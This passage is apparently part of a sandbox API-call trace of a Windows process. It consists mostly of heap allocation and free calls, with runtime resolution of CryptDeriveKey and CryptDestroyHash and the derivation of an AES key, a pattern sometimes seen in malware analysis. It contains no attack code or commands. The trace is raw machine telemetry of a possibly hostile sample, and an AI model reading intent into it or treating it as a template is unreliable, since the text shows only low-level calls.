0x2e54da8 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0204.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0204.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0204.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0204.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0204.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0204.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e509e0 [0204.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0204.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0204.534] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0204.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0204.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0204.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0204.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0204.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0204.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0204.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0204.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0204.535] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87610, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0204.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0204.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0204.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0204.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0204.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0204.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0204.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0204.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0204.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0204.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0204.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0204.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0204.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0204.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0204.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.540] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0204.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0204.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0204.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0204.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0204.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0204.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0204.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0204.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69888, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0204.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0204.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0204.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0204.541] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0204.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0204.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0204.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0204.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0204.542] CryptDestroyHash (hHash=0xa87610) returned 1 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0204.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0204.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0204.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0204.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, 